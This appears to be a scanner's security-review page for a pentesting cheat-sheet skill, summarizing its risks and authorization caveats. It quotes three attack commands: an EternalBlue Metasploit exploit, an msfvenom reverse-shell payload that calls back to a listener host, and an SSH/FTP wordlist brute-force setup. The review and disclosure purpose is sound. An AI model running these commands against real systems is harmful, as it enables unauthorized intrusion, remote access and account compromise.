Pentest Commands
Security checks across static analysis, malware telemetry, and agentic risk
Overview
This is an instruction-only pentesting cheat sheet that contains powerful exploit, brute-force, and payload commands, but it does not install or run code by itself.
Install or use this only if you need a penetration-testing command reference. The skill itself does not install or run tools, but its commands can scan, exploit, brute-force, and generate reverse-shell payloads, so only use them on targets where you have explicit authorization.
Static analysis
No static analysis findings were reported for this release.
VirusTotal
VirusTotal findings are pending for this skill version.
Risk analysis
Artifact-based informational review of SKILL.md, metadata, install specs, static scan signals, and capability signals. ClawScan does not execute the skill or run runtime probes.
If copied or run against systems outside an approved assessment, these commands could disrupt or compromise third-party machines.
The skill provides ready-to-run exploitation commands. This is purpose-aligned for a pentest reference, but misuse could target systems without authorization.
msfconsole -x "use exploit/windows/smb/ms17_010_eternalblue; set RHOST 192.168.1.1; exploit"
Use only on explicitly authorized targets, and require user confirmation of scope before running exploit or scan commands.
Running or deploying generated payloads can execute code on target systems and may create unauthorized remote access.
The skill includes commands that generate reverse-shell payload files. This is expected for offensive security work, but the generated files are executable attack artifacts.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=4444 -f exe > shell.exe
Generate and deploy payloads only in a lab or authorized assessment, and keep payload files clearly labeled and contained.
Improper use could lock accounts, trigger security incidents, or attempt unauthorized logins.
The skill documents SSH/FTP brute-force workflows using username and password wordlists. Credential testing is purpose-aligned for pentesting but is high-impact account access behavior.
set RHOSTS 192.168.1.0/24; set USER_FILE users.txt; set PASS_FILE passwords.txt; run
Use credential-testing commands only with written authorization, rate limits, and agreed account/target scope.